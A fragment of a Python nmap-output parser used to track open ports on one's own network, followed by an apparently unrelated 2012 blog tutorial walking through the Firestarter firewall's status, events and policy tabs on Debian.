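    print(open_ports(parse_nmap_text(SCAN_OUTPUT)))
```

Storing the open_ports() map from each scheduled scan and diffing it against the previous one is the simplest way to notice a new service appearing on your own network, which is the monitoring use the nmap.org text refers to.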


Wednesday, April 11, 2012

Tutorial02:Dive into Firestarter


You have just seen, in the previous tutorial, the (in my opinion) fantastic features of your new firewall!
Don't you also think it's time to go deeper? "The well known dive into firewall!"
All that remains is to navigate the Debian menu, simply by clicking Applications > Internet > Firestarter, and you will see Firestarter running.

In the Firewall status area at the very top we can tell whether Firestarter is running normally. Right below, under Network, we can see which interface we have. Right next to it we can see the packets entering and leaving our computer. Finally, our active connections are shown: the ports in use, the destinations and of course the services and the programs running each service!
Let's look at the other tabs too!
The Events tab, at the top of Firestarter, shows us what is happening in the network and which actions are considered dangerous and have been blocked by Firestarter. Also, if someone attempts to attack you (for example port scanning), not only will they be unable to run the attack, but Firestarter will notify you immediately by showing an icon at the top of your screen!
Finally, the Policy tab gives us the ability to "add a rule", for example to open a port, something I would *not* recommend!